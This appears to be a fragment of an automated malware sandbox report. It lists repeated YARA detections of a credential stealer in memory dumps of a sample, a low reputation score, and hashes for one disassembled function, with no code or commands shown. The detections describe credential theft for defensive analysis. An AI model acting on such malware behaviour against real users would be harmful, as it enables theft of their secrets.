                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155948563.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155317529.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2081770128.000000000143A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154029832.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155652947.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156895572.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155068276.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156371674.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156729304.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157064648.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155858032.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154297810.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2081624288.0000000001437000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Non-executed Functions

                                                                              Function 013D499B Relevance: .2, Instructions: 222COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Offset: 013CE000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_13ce000_file.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 608ed672abf0a2ae6958bb8d4047ebe09c2ed9d94db7d8ce044a8c955983d548
                                                                              • Instruction ID: 1fb9a101bf08a0d838ba179d51d9a8fa2d254b5bc81b493c959a8c7661831a32
                                                                              • Opcode Fuzzy Hash: 608ed672abf0a2ae6958bb8d4047ebe09c2ed9d94db7d8ce044a8c955983d548
                                                                              • Instruction Fuzzy Hash: 9851255684E3C01FD3238B789C64A9ABFB69E53544B0E82CBD0D1CF8A3D1595D19C323